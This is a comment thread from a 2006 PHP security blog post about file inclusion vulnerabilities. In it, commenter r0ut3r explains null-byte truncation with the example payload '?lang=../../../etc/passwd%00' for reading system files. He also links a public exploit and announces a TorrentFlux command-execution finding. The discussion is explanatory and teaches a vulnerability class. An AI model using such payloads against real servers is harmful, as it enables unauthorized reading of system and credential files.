Comments on: 2 Easy Steps to Increase Security in PHP http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/ Blog of a Programmer. Sun, 22 Jun 2008 09:21:23 +0000 http://wordpress.org/?v=2.5.1 By: r0ut3r http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3489 r0ut3r Wed, 15 Nov 2006 13:41:28 +0000 http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3489 you gonna find this interesting, heh: --------------------------------------- ################################################################################################# # # r0ut3r Presents... # # # # Another r0ut3r discovery! # # # # TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerablities # # # ################################################################################################# It'll be on my site. :) r0ut3r. you gonna find this interesting, heh:
—————————————
################################################################################################# #
# r0ut3r Presents… #
# #
# Another r0ut3r discovery! #
# #
# TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerablities #
# #
#################################################################################################

It’ll be on my site. :)
r0ut3r.

]]> By: r0ut3r http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3485 r0ut3r Tue, 14 Nov 2006 11:17:32 +0000 http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3485 "The ? in url starts the query string. Ie. http://www.stevenroddis.com/evil.txt?87as == http://www.stevenroddis.com/evil.txt " Yes, but thats not what i am talking about. Say you have a local file include vuln, like these ones: http://milw0rm.com/exploits/2768 You see the vulnerable code there? And you see it adds .language.php on the end of the file? .$setLang.'.language.php'); So if you just did a request like: ?lang=../../../etc/passwd it will try and read the file: /etc/passwd.language.php Now thats going to create a problem and render this exploit practically useless. Now to the point, with a little background. In many programming languages you can use null characters to do stuff, depending on what you need it to do, in C you use , and in PHP we use %00. Now what a null byte actually does, and is commonly used for is stopping a string or function midway. Note: I've only used a null byte in C once, and it was for an authentication script where i was trying to prevent some form of vulnerability, can't remember, awhile ago. I've never used it in PHP except to assist in exploitation. So back to the example; to stop the script from adding .language.php onto the end, it must be stopped half way. Therefore... We will inject a null byte and stop it half way, preventing .language.php from being added, to do this it is done like so: ?lang=../../../etc/passwd%00 Does this make sense now? r0ut3r (writ3r [ at ] gmail.com) “The ? in url starts the query string.

Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt
Yes, but thats not what i am talking about.

Say you have a local file include vuln, like these ones:
http://milw0rm.com/exploits/2768
You see the vulnerable code there? And you see it adds .language.php on the end of the file?

.$setLang.’.language.php’);

So if you just did a request like:
?lang=../../../etc/passwd
it will try and read the file:
/etc/passwd.language.php
Now thats going to create a problem and render this exploit practically useless.

Now to the point, with a little background. In many programming languages you can use null characters to do stuff, depending on what you need it to do, in C you use , and in PHP we use %00. Now what a null byte actually does, and is commonly used for is stopping a string or function midway. Note: I’ve only used a null byte in C once, and it was for an authentication script where i was trying to prevent some form of vulnerability, can’t remember, awhile ago. I’ve never used it in PHP except to assist in exploitation. So back to the example; to stop the script from adding .language.php onto the end, it must be stopped half way. Therefore…

We will inject a null byte and stop it half way, preventing .language.php from being added, to do this it is done like so:
?lang=../../../etc/passwd%00

Does this make sense now?

r0ut3r (writ3r [ at ] gmail.com)

]]> By: Steven Roddis http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3400 Steven Roddis Sun, 05 Nov 2006 01:00:12 +0000 http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3400 "meaning you would need to have a file named “evil?bar.php”, but this is not the case, just inject a null value to make it stop half way through the include statement." The ? in url starts the query string. Ie. http://www.stevenroddis.com/evil.txt?87as == http://www.stevenroddis.com/evil.txt “meaning you would need to have a file named “evil?bar.php”, but this is not the case, just inject a null value to make it stop half way through the include statement.”

The ? in url starts the query string.

Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt

]]> By: r0ut3r http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3399 r0ut3r Sun, 05 Nov 2006 00:48:25 +0000 http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3399 i was under the impression you were refering to this: eg. include($foo.’bar.php’); -------------------------- Now if $foo is set to ‘http://www.stevenroddis.com/evil?’ The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php” -------------------------- meaning you would need to have a file named "evil?bar.php", but this is not the case, just inject a null value to make it stop half way through the include statement. And when you say "(Still with limitations such as the appending string)" - no need to worry about appending string if you use the method i described above ;) That should help, if not, just send me an email. writ3r [ at ] gmail.com i was under the impression you were refering to this:
eg. include($foo.’bar.php’);

————————–
Now if $foo is set to ‘http://www.stevenroddis.com/evil?’

The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”
————————–
meaning you would need to have a file named “evil?bar.php”, but this is not the case, just inject a null value to make it stop half way through the include statement.

And when you say “(Still with limitations such as the appending string)” - no need to worry about appending string if you use the method i described above ;)

That should help, if not, just send me an email. writ3r [ at ] gmail.com

]]> By: Steven Roddis http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-2572 Steven Roddis Tue, 17 Oct 2006 06:35:06 +0000 http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-2572 And how are you going to do that? $foo = 'bar'; include('/file.txt'.$foo); ?? And how are you going to do that?

$foo = ‘bar’;

include(’/file.txt’.$foo);

??

]]> By: r0ut3r http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-2570 r0ut3r Mon, 16 Oct 2006 23:51:50 +0000 http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-2570 "But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)" - Not if you stop it midway through the include... “But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)” - Not if you stop it midway through the include…

]]>